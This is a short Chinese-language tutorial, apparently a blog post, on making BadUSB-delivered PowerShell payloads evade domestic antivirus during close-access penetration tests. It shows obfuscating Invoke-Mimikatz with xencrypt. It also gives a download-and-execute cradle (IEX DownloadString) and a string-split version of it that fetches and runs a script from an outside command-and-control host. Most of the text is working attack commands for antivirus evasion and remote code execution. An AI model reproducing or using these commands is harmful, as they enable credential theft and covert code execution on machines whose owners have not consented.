近源渗透测试badusb执行代码的免杀
在进行近源渗透测试的时候,我们发现国内杀软对powershell的管制非常的严格,只要有后台隐藏执行的powershell都会触发可疑行为警报,但是这不代表不能绕过。
生成powershell payload
如图生成payload,我们使用powershell的payload,就不用勾选64位了
powershell混淆
接下来做混淆,否则ps脚本下载下来也是被杀软秒杀的,可以使用InvokeObfuscation或者xencrypt。
我这里使用的是xencrypt
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 68
可以选择免杀68次
https://github.com/the-xentropy/xencrypt
badusb运行脚本拆分免杀
由于免杀后的脚本会很大,所以我们可以用powershell IEX(New-Object Net.WebClient).DownloadString("http://x.x.x.x/2.ps1")从服务器下载ps脚本运行,但是会被杀软杀,所以可以用拆分免杀。
powershell.exe ”$a1='IEX ((new-objectnet.webclient).downl';$a2='oadstring(''http://c2.mtfly.net/2.ps1''))';$a3="$a1,$a2";IEX(-join $a3)""